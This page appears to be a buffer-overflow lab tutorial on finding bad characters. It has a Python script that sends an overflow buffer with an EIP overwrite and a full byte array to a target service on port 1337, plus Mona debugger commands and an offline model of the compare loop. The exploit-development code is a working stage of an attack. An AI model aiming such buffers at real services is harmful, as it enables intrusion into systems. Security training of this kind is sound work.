# Finding Bad Characters

## Possible Bad Characters

Below is the full set of byte values that could turn out to be bad characters. `\x00` is left out on purpose: it is treated as a bad character in almost every case, so it is excluded from the start.

```
badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
```

## Modifying POC

We will again modify our initial proof of concept, this time appending the array of bad characters to the buffer. Sending this buffer lets us determine which characters the application mangles, by analysing the crash in Immunity Debugger with the help of `Mona`.

### badChars.py

```
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")

    # Every byte value except \x00, which is treated as bad from the start.
    # Bytes literals keep the script working on both Python 2 and Python 3.
    badchars = (
        b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
        b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
        b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
        b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
        b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
        b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
        b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
        b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
        b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
        b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
        b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
        b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
        b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
        b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
        b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
        b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )

    prefix = b"OVERFLOW10 "
    filler = b"A" * 537   # padding up to the saved return address
    eip = b"B" * 4        # overwrites EIP with 42424242
    buffer = prefix + filler + eip + badchars   # badchars land where ESP points

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)
    s.close()

    print("\nDone!")

except socket.error as e:
    print("\nCould not connect! (%s)" % e)
```

## Bad Chars

```
python badChars.py
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcCf6I6u3GSZlMpCGM%2Fimage.png?alt=media\&token=11d2e4c0-0462-4900-a74a-e0d3153fa4b9)

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcChialSn6pYM1X4LS%2Fimage.png?alt=media\&token=892bf66d-1460-4958-872b-8c29138c6a54)

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcCW79_I5GWSwJYunR%2F-MdcCp300ZImzYfNWaCZ%2Fimage.png?alt=media\&token=ac5b4302-5abb-4621-a351-98627721167f)

Once the bad chars have been sent, following `ESP` in the dump window shows where our characters landed in memory. From there we can use `mona` to compare what is in memory against the original byte array and locate the actual bad characters.

### Setting working directory for Mona

```
!mona config -set workingfolder c:\Temp
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDJ5TLfJij9kL7Is0%2Fimage.png?alt=media\&token=1a0cb4db-931d-4189-9c47-319cfbe6e4b7)

### Creating Bytearray with Mona

```
!mona bytearray -b "\x00"
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDSJ_WADrS-W3g4-S%2Fimage.png?alt=media\&token=3f025862-159a-425d-b4fe-047a6502bb2c)

### Locating Bad Characters

```
!mona compare -f C:\Temp\bytearray.bin -a <ESP Address>
```

![ESP address](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDcb4erpDDIwNRgLX%2Fimage.png?alt=media\&token=474da25f-feef-4f0c-a014-54bae3267090)

```
!mona compare -f C:\Temp\bytearray.bin -a 0122FA18
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDljoWVKmGYlggdJB%2Fimage.png?alt=media\&token=308c67ad-faa1-4a56-8407-8bb7719ad727)

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MdOcy1ba9EGn2GQ7ELK%2F-MdcD0KlUT742Xxl5Ghq%2F-MdcDnQJ39QbR__jUYZ1%2Fimage.png?alt=media\&token=eac91c00-324a-4d4f-835b-75cedec34040)

Now that we have the results, we drop the second byte of each consecutive pair listed under the Badchars column, because the byte immediately after a real bad character is usually reported as corrupted too, and we keep `\x00`, which is bad in every case. That leaves a bad character set of:

```
\x00\xa0\xad\xbe\xde\xef
```
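The following is an added, self-contained model of the workflow on this page; it is not the page's own script and not Mona. `build_bytearray` stands in for `!mona bytearray -b`, `compare` for `!mona compare`, and `reduce_consecutive` applies the "drop the consecutive follow-on byte" rule from the paragraph above. The target is replaced by `simulate_target`, a constructed stand-in whose mangling behaviour is chosen to reproduce the page's result and is not the real application's behaviour.

```python
"""Offline model of bad-character hunting: build the test array, diff what
was sent against what landed in memory, reduce the raw mismatch list, and
iterate until the buffer arrives unmodified."""


def build_bytearray(exclude=(0x00,)):
    """Every byte value 0x00-0xff except those in `exclude`
    (the same idea as `!mona bytearray -b "\\x00"`)."""
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def compare(sent, dumped):
    """Walk both buffers in lockstep (like `!mona compare`) and return the
    values from `sent` whose byte at the same offset differs in `dumped`."""
    return [b for i, b in enumerate(sent)
            if i >= len(dumped) or dumped[i] != b]


def reduce_consecutive(diffs):
    """Keep only the first value of each run of consecutive byte values:
    the byte right after a real bad character is normally reported as
    corrupted too, so a0 a1 is one bad char (a0), not two."""
    result, prev = [], None
    for b in diffs:
        if prev is None or b != prev + 1:
            result.append(b)
        prev = b
    return result


def simulate_target(data, mangled=(0xa0, 0xad, 0xbe, 0xde, 0xef)):
    """Constructed stand-in for the vulnerable service (not real behaviour):
    each byte in `mangled` and the byte after it are overwritten with 0x00,
    which mimics the paired corruption seen in real compare output."""
    out = bytearray(data)
    for i, b in enumerate(data):
        if b in mangled:
            out[i] = 0x00
            if i + 1 < len(out):
                out[i + 1] = 0x00
    return bytes(out)


def find_bad_chars(target, always_bad=(0x00,), max_rounds=8):
    """Repeat send / compare / exclude until the target returns the array
    untouched. `target` is any callable mapping sent bytes to dumped bytes."""
    exclude = set(always_bad)
    for _ in range(max_rounds):
        arr = build_bytearray(exclude)
        diffs = compare(arr, target(arr))
        if not diffs:
            return sorted(exclude)
        exclude.update(reduce_consecutive(diffs))
    raise RuntimeError("buffer still modified after %d rounds" % max_rounds)


def format_badchars(values):
    """Render a list of byte values in the \\xNN form used in the page."""
    return "".join("\\x%02x" % b for b in values)


if __name__ == "__main__":
    first = build_bytearray()
    raw = compare(first, simulate_target(first))
    print("raw compare output :", format_badchars(raw))
    print("after reduction    :", format_badchars(reduce_consecutive(raw)))
    print("confirmed bad chars:", format_badchars(find_bad_chars(simulate_target)))
```

Against the constructed target the first round reports `a0 a1 ad ae be bf de df ef f0`, reduction leaves `a0 ad be de ef`, and the second round comes back clean, giving `\x00\xa0\xad\xbe\xde\xef`. The loop in `find_bad_chars` is the part worth carrying over to the real workflow: regenerate the byte array with `!mona bytearray -b` excluding the candidates, resend, and compare again until Mona reports the buffer as unmodified, since two genuinely bad bytes that happen to be adjacent would otherwise be collapsed into one by the consecutive-pair rule.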
